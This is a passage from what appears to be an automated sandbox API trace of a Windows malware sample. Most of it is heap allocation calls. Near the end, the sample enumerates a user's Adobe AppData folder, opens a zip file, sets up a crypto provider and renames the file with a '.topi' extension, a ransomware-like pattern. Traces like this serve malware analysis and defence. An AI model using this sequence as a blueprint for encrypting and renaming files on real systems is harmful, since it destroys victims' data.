dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0098.033] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.033] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.033] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0098.033] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0098.033] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.033] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.033] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.033] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.033] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.033] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.033] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.033] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.033] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.033] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.033] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.033] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0098.033] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.033] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0098.033] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.034] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.034] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0098.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.034] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.034] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0098.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.034] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.034] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.034] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.034] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.034] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.034] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.034] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.034] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.034] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.034] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.034] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.034] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.035] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.035] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.035] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.035] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.035] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.035] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.035] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.035] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.035] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0098.035] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.035] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0098.035] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.035] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.035] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.035] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.035] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.035] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.035] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0098.035] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0098.035] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.035] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.035] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0098.035] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0098.035] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.035] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.035] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.035] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.035] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.035] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.035] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.035] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.035] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.035] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.036] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.036] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0098.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0098.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.036] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.036] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0098.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.036] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.036] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0098.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.036] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.036] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.036] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.036] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.036] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.036] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.036] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.036] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.036] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.036] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.036] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.036] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.037] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.037] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.037] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.037] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.037] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.037] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.037] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.037] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.037] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0098.037] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.037] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0098.037] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.037] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.037] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.037] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.037] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.037] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.037] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0098.037] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0098.037] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.037] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.037] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0098.037] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0098.037] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.037] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.037] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.037] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.037] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.037] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.037] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.037] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.037] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.037] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.037] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.037] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0098.038] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.038] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0098.038] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.038] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.038] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0098.038] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.038] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.038] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.038] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.038] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.038] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.038] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.038] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.038] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.038] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.038] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.038] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.038] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.038] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.038] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.038] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.038] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.038] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\") returned="10.0\\" [0098.038] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df3c0 [0098.039] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\") returned="Acrobat\\" [0098.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0098.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x31621a8 [0098.039] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0098.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d8a8 [0098.039] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0098.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb988 [0098.039] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0098.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fbd10 [0098.039] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0098.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3f40 [0098.039] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0098.039] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0098.039] PathFindFileNameW (pszPath="") returned="" [0098.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.039] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe5b04330, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xe5b04330, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31c7500 [0098.042] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip") returned=".zip" [0098.042] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\rdrmessage.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0098.043] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=42495) returned 1 [0098.043] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0098.046] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xa5d9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.046] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0098.048] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0098.049] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df3c0) returned 1 [0098.050] CryptCreateHash (in: hProv=0x6df3c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0098.050] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0098.050] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0098.050] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0098.050] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0098.050] GetLastError () returned 0x0 [0098.050] CryptDestroyHash (hHash=0x31c7580) returned 1 [0098.050] CryptReleaseContext (hProv=0x6df3c0, dwFlags=0x0) returned 1 [0098.050] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0098.050] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0098.050] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0098.050] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0098.050] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0098.050] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0098.050] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0098.051] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa600) returned 0x9a06a00 [0098.051] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0098.051] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0098.051] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0098.051] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0098.051] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0098.051] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0098.051] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fbd10 [0098.051] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e50a8 [0098.052] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\rdrmessage.zip"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\rdrmessage.zip.topi")) returned 1 [0098.052] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0098.052] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0098.052] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.054] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x766b58 | out: hHeap=0x680000) returned 1 [0098.054] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xce824760, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xce824760, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe5ab8070, 